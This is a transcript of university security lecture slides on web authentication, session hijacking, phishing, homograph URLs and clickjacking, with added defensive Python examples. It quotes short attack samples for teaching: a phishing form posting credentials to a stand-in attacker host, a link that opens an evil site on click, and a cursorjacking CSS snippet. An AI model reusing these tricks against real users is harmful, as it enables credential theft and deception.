
Web Security: Authentication & UI-based attacks CS 161: - PowerPoint PPT Presentation



  1. Web Security: Authentication & UI-based attacks
     CS 161: Computer Security, Prof. Raluca Ada Popa, April 12, 2016
     Credit: some slides are adapted from previous offerings of this course or from CS 241 of Prof. Dan Boneh

  2. Authentication & Impersonation

  3. Authentication
     Verifying that someone really is who they claim to be.
     • The web server should authenticate the client
     • The client should authenticate the web server

  4. Impersonation
     Pretending to be someone else. An attacker can try to:
     • Impersonate the client
     • Impersonate the server

  5. Authenticating users
     How can a computer authenticate the user?
     • "Something you know", e.g., password, PIN
     • "Something you have", e.g., smartphone, ATM card, car key
     • "Something you are", e.g., fingerprint, iris scan, facial recognition

  6. Recall: two-factor authentication
     Authentication using two of:
     • Something you know (account details or passwords)
     • Something you have (tokens or mobile phones)
     • Something you are (biometrics)

  7. Example: is this a good example of 2FA?
     Online banking:
     • Hardware token or card ("something you have")
     • Password ("something you know")
     Mobile phone two-factor authentication:
     • Password ("something you know")
     • Code received via SMS ("something you have")
     Email authentication:
     • Password
     • Answer to a security question
     The last one is not two-factor authentication, because both factors are something you know.

  8. After authenticating..
     A session is established:
     • The session ID is stored in a cookie
     • The web server maintains a list of active sessions (sessionID mapped to user info)
     Reauthentication happens automatically on every HTTP request:
     • Recall that every HTTP request to the site carries the cookie

  9. After authenticating..
     Alice's browser holds sessionID = 3458904043 and sends it to the server.
     Active sessions on the server (sessionID | name):
       3458904043 | Alice
       5465246234 | Bob
     Session IDs must be unpredictable.
     Session hijacking attack:
     • Attacker steals the sessionID, e.g., using a packet sniffer
     • Attacker impersonates the user

  10. After authenticating..
     (Same picture: Alice's sessionID = 3458904043; active sessions 3458904043 | Alice, 5465246234 | Bob. Must be unpredictable.)
     Protect the sessionID from packet sniffers:
     • Send it encrypted over HTTPS
     • Use the secure cookie flag to ensure this
     When should the session/cookie expire?
     • Often is more secure
     • But less usable for the user
     Other flags?
     • httponly, to prevent scripts from getting to it

  11. After authentication..
     (Same picture: Alice's sessionID = 3458904043; active sessions 3458904043 | Alice, 5465246234 | Bob. Must be unpredictable.)
     What if an attacker obtains an old sessionID somehow?
     • When the user logs out, the server must remove Alice's entry from the active sessions
     • The server must not reuse the same session ID in the future
     • Then the old sessionID will not be useful
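The session-handling rules of slides 8 to 11 (unpredictable IDs, Secure and HttpOnly cookie flags, expiry, removal on logout, no reuse of an old ID) carried into a small server-side session store. This is an added Python example, not code from the lecture; the SessionStore class, the IDLE_TIMEOUT value, the injectable clock and the user name "Alice" are assumptions made for the demonstration.

```python
"""Server-side session store illustrating the rules from the lecture slides.
Added example; the class, timeout and clock parameter are assumptions."""
import secrets
import time

SESSION_BYTES = 32          # 256 bits of randomness: practically unguessable
IDLE_TIMEOUT = 15 * 60      # assumed idle expiry in seconds (short = more secure, less usable)


class SessionStore:
    """Maps sessionID -> user, the 'active sessions' table from the slides."""

    def __init__(self, now=time.time):
        self._now = now            # clock is injectable so expiry can be tested
        self._active = {}          # sessionID -> {"user": ..., "last_seen": ...}
        self._retired = set()      # IDs handed out before; never issued again

    def create(self, user: str) -> str:
        """Issue a fresh, unpredictable session ID for a user who just logged in."""
        while True:
            sid = secrets.token_urlsafe(SESSION_BYTES)   # CSPRNG, not a counter
            if sid not in self._active and sid not in self._retired:
                break
        self._active[sid] = {"user": user, "last_seen": self._now()}
        return sid

    def lookup(self, sid: str):
        """Re-authenticate a request by its cookie; None means 'not logged in'."""
        entry = self._active.get(sid)
        if entry is None:
            return None
        if self._now() - entry["last_seen"] > IDLE_TIMEOUT:
            self.logout(sid)                              # expired: treat as logged out
            return None
        entry["last_seen"] = self._now()
        return entry["user"]

    def logout(self, sid: str) -> None:
        """Remove the entry so a stolen or leaked old ID is useless afterwards."""
        if self._active.pop(sid, None) is not None:
            self._retired.add(sid)


def session_cookie(sid: str) -> str:
    """Set-Cookie value: Secure keeps it off plaintext HTTP, HttpOnly keeps scripts away."""
    return f"sessionID={sid}; Secure; HttpOnly; SameSite=Lax; Path=/"


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("Alice")                 # constructed user
    print("Set-Cookie:", session_cookie(sid))
    print("request with cookie ->", store.lookup(sid))
    store.logout(sid)
    print("after logout ->", store.lookup(sid))
```

With 256 random bits per ID the `_retired` check never fires in practice; it is kept because the slide states the rule explicitly, and a real deployment would instead bound the table by storing sessions with a TTL in a database or cache.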

  12. Authenticating the server
     Which mechanism that we learned about helps prevent an attacker from impersonating a server?
     Digital certificates (assuming the CA or the relevant secret keys were not compromised).
     But these only establish that the host a user visits has a certain public key. What if the user visits a malicious host?

  13. Phishing attack
     • Attacker creates a fake website that appears similar to a real one
     • Tricks the user into visiting the site (e.g., by sending email)
     • User enters credentials and sensitive data, which get sent to the attacker
     • The web page then redirects to the real site or shows a maintenance notice

  14. http://paypal.attacker.com/ (screenshot of a phishing page; its login form posts to the attacker)
     <form action="http://attacker.com/paypal.php" method="post" name=Date>

  15.-19. http://ebay.attacker.com/ (a sequence of screenshots of a phishing page imitating eBay; only the URL survives in the transcript)

  20. Phishing prevention
     The user should check the URL they are visiting! (Screenshot: http://ebay.attacker.com/)

  21. It does not suffice to check what the link says you are clicking on
     Link text: "Now go to Google! http://google.com"
     Because the underlying HTML can be:
     <a href="http://attacker.com">http://google.com</a>
     Check the address bar!

  22. URL obfuscation attack
     The attacker can choose a similar-looking URL with a typo:
     • bankofamerca.com
     • bankofthevvest.com

  23. Homograph attack
     • Unicode characters from international alphabets may be used in URLs
     • paypal.com with the first p replaced by the Cyrillic letter er (р, U+0440)
     • The URL seems correct, but is not
     Another example: www.pnc.com⁄webapp⁄unsec⁄homepage.var.cn
     The "⁄" characters are not path separators, so "pnc.com⁄webapp⁄unsec⁄homepage" is one string inside the hostname.
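A defensive link checker covering the three tricks of slides 21 to 23: link text that names a different host than the href, typo-squatted domains, and homographs built from mixed Unicode scripts or the fraction-slash character. This is an added Python example, not code from the lecture. The two-label "registrable domain" rule, the edit-distance threshold of 2 and the list of expected brand domains passed by the caller are simplifying assumptions made for the demonstration.

```python
"""Heuristic checks for deceptive links (added example, not from the lecture)."""
import unicodedata

FRACTION_SLASH = "\u2044"   # renders like "/", but is an ordinary hostname character


def host_of(url: str) -> str:
    """Extract the hostname by hand so unusual characters are kept verbatim."""
    rest = url.split("://", 1)[1] if "://" in url else url
    for sep in ("/", "?", "#"):
        rest = rest.split(sep, 1)[0]
    rest = rest.rsplit("@", 1)[-1]      # drop any userinfo
    rest = rest.split(":", 1)[0]        # drop any port
    return rest.rstrip(".").lower()


def registrable(host: str) -> str:
    """Last two labels of the host. Simplification: ignores multi-label public suffixes."""
    return ".".join(host.split(".")[-2:])


def scripts_in(host: str) -> set:
    """Unicode scripts of the letters in the host, e.g. {'LATIN', 'CYRILLIC'}."""
    found = set()
    for ch in host:
        if ch in ".-" or ch == FRACTION_SLASH or ch.isdigit():
            continue
        found.add(unicodedata.name(ch, "UNKNOWN").split(" ")[0])
    return found


def edit_distance(a: str, b: str) -> int:
    """Plain Levenshtein distance, used to spot typo-squats of known domains."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def check_link(href: str, text: str = None, expected: tuple = ()) -> list:
    """Return human-readable warnings; an empty list means nothing looked suspicious."""
    warnings = []
    host = host_of(href)
    reg = registrable(host)
    # Slide 21: the visible text names one host, the href goes somewhere else.
    if text and "." in text and registrable(host_of(text)) != reg:
        warnings.append(f"link text shows {host_of(text)} but href goes to {host}")
    # Slide 23: fraction slashes make a "path" part of the hostname.
    if FRACTION_SLASH in host:
        warnings.append(f"host contains U+2044 fraction slash; real domain is {reg}")
    # Slide 23: Latin letters mixed with look-alikes from another script.
    scripts = scripts_in(host)
    if len(scripts) > 1:
        warnings.append(f"host mixes scripts: {sorted(scripts)}")
    # Slide 22: one or two edits away from a domain we expect to see.
    for good in expected:
        if reg != good and edit_distance(reg, good) <= 2:
            warnings.append(f"{reg} looks like a typo of {good}")
    return warnings


if __name__ == "__main__":
    brands = ("bankofamerica.com", "bankofthewest.com", "paypal.com")  # constructed list
    for href, text in [("http://attacker.com", "http://google.com"),
                       ("http://bankofthevvest.com/login", None),
                       ("http://\u0440aypal.com/", None),
                       ("http://www.pnc.com\u2044webapp\u2044unsec\u2044homepage.var.cn", None)]:
        print(href, "->", check_link(href, text, brands))
```

Run it and each of the slide's examples produces at least one warning, while an honest link such as `check_link("https://www.google.com/", "http://google.com")` returns an empty list. A mail filter or a browser extension would apply the same checks before the user ever sees the link.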

  24. Phishing prevention
     The user should check the URL! Carefully!

  25. "Spear Phishing"
     Targeted phishing that includes details which seemingly must mean it's legitimate.

  26. Yep, this is itself a spear-phishing attack!

  27. Sophisticated phishing
     Context-aware phishing: 10% of users fooled
     • Spoofed email includes info related to a recent eBay transaction/listing/purchase
     Social phishing: 70% of users fooled
     • Spoofed email appears to be from one of the victim's friends (inferred using social networks)
     West Point experiment
     • Cadets received a spoofed email near the end of the semester: "There was a problem with your last grade report; click here to resolve it." 80% clicked.

  28. Why does phishing work?
     • User mental model vs. reality: the browser security model is too hard to understand!
     • The easy path is insecure; the secure path takes extra effort
     • Risks are rare

  29. Authenticating the server
     Users should:
     • Check the address bar carefully. Or, load the site via a bookmark or by typing into the address bar.
     • Guard against spam
     • Not click on links or attachments from unknown senders
     Browsers also receive regular blacklists of phishing sites (but this is not immediate).
     Mail servers try to eliminate phishing email.

  30. Authentication summary
     • We need to authenticate both users and servers
     • A phishing attack impersonates the server
     • A disciplined user can reduce the occurrence of phishing attacks

  31. UI-based attacks

  32. Clickjacking attacks
     Exploitation where a user's mouse click is used in a way that was not intended by the user.

  33. Talk to your partner
     How can a user's click be used in a way different from what was intended?

  34. Simple example
     <a onMouseDown="window.open('http://www.evil.com')" href="http://www.google.com/">Go to Google</a>
     What does it do? Opens a window to the attacker's site.
     Why include an href to Google? The browser status bar shows the href URL when hovering over the link, which users rely on as a means of protection.

  35. Recall: Frames
     • A frame is used to embed another document within the current HTML document
     • Any site can frame another site
     • The <iframe> tag specifies an inline frame

  36. Example HTML page
     <iframe src="http://www.google.com/"> </iframe>
     (Diagram of the UI rendering: the framing page, or outer page, contains the framed page, or inner page.)

  37. Frames
     • The outer page can set the frame's width and height
     • But only the framed site can draw inside its own rectangle
     • Modularity: brings together code from different sources

  38. What happens in this case?
     (Diagram: a "Funny cats" website frames a page holding a secret, while JavaScript on the outer page tries to reach the secret.)

  39. Frames: same-origin policy
     • A frame inherits the origin of its URL
     • Same-origin policy: if the frame and the outer page have different origins, they cannot access each other
     • In particular, malicious JS on the outer page cannot access resources of the inner page

  40. How to bypass the same-origin policy for frames? Clickjacking

  41. Clickjacking using frames
     • The evil site frames the good site
     • The evil site covers the good site by putting dialogue boxes or other elements on top of parts of the framed site, to create a different effect
     • The inner site now looks different to the user
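Slides 35 to 41 rely on the default that any site can frame any other site. The standard server-side defense is to tell the browser who may frame the page, with the `X-Frame-Options` header and, in newer browsers, the CSP `frame-ancestors` directive. The code below, an added Python example that is not from the lecture, generates those headers for a sensitive page and models how a browser decides whether a given framing origin is allowed. The origins bank.example, partner.example and evil.example are constructed; the evaluation ignores wildcard and scheme-only CSP sources, which is a simplification of the real browser algorithm.

```python
"""Anti-clickjacking response headers and a simplified browser-side evaluation.
Added example; the origins used are constructed for the demonstration."""


def anti_framing_headers(allowed_ancestors=()) -> dict:
    """Headers a server should send on pages whose clicks matter (logout, pay, like...).

    With no allowed ancestors the page refuses all framing, using both the legacy
    header and the CSP directive so old and new browsers are covered.
    """
    if not allowed_ancestors:
        return {
            "X-Frame-Options": "DENY",
            "Content-Security-Policy": "frame-ancestors 'none'",
        }
    # Selective framing can only be expressed with CSP; 'self' means same origin.
    return {"Content-Security-Policy": "frame-ancestors " + " ".join(allowed_ancestors)}


def framing_allowed(headers: dict, page_origin: str, framer_origin: str) -> bool:
    """Would a browser render page_origin inside a frame owned by framer_origin?

    Mirrors the browser rule that frame-ancestors, when present, takes precedence
    over X-Frame-Options. No header at all means: anyone may frame the page.
    """
    hdrs = {k.lower(): v for k, v in headers.items()}   # header names are case-insensitive
    page, framer = page_origin.lower(), framer_origin.lower()

    for directive in hdrs.get("content-security-policy", "").split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            sources = [s.lower() for s in tokens[1:]]
            if "'none'" in sources:
                return False
            if "'self'" in sources and framer == page:
                return True
            return framer in sources          # explicit origin match only (simplified)

    xfo = hdrs.get("x-frame-options", "").strip().upper()
    if xfo == "DENY":
        return False
    if xfo == "SAMEORIGIN":
        return framer == page
    return True                               # the permissive default clickjacking relies on


if __name__ == "__main__":
    bank, evil, partner = "https://bank.example", "https://evil.example", "https://partner.example"
    for label, hdrs in [("no headers", {}),
                        ("deny all", anti_framing_headers()),
                        ("self + partner", anti_framing_headers(["'self'", partner]))]:
        print(f"{label:15s} framed by evil:    {framing_allowed(hdrs, bank, evil)}")
        print(f"{label:15s} framed by partner: {framing_allowed(hdrs, bank, partner)}")
```

The lesson of the "no headers" row is the one the slides make: a page that sends neither header can be framed and overlaid by any origin, so the same-origin policy protects its data but not the meaning of the user's click.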

  42. Compromise visual integrity – target
     Hiding the target; partial overlays. (Diagram: a "$0.15" price label and a "Click" button overlaid on the framed page.)

  43. UI Subversion: Clickjacking
     An attack application (script) compromises the context integrity of another application's User Interface when the user acts on the UI.
     Context integrity consists of visual integrity + temporal integrity.
     Visual integrity:
     • Target is visible
     • Pointer is visible
     Temporal integrity:
     • Target clicked = target checked
     • Pointer clicked = pointer checked
     Sequence: 1. Target checked  2. Initiate click  3. Target clicked

  44. Compromise visual integrity – target (repeats slide 42: hiding the target, partial overlays)

  45. Compromise visual integrity – pointer: cursorjacking
     The cursor can be customized! CSS example:
     #mycursor { cursor: none; width: 97px; height: 137px; background: url("images/custom-cursor.jpg") }
     JavaScript can keep updating the cursor and can display a shifted cursor.
     (Diagram: a fake cursor that is more visible than the real cursor.)

  46. Compromise visual integrity – pointer: cursorjacking
     Cursorjacking deceives a user by using a custom cursor image, where the pointer is displayed with an offset.
     (Diagram: a "Download .exe" button; the fake cursor is more visible than the real one.)

  47. Clickjacking to Access the User's Webcam
     (Diagram: fake cursor vs. real cursor over a webcam permission dialog.)

  48. Sitekeys
     • Some sites use/used a secret image to identify the site to the user (e.g., Bank of America)
     • Only the good site should know the secret image
     • The user should check that they receive the correct image
     • What is it aimed to protect against? Phishing attacks
     Invented by a Berkeley grad student! Not really used much now, and not considered effective, mostly because users ignore these images and don't remember which image belongs to each site.
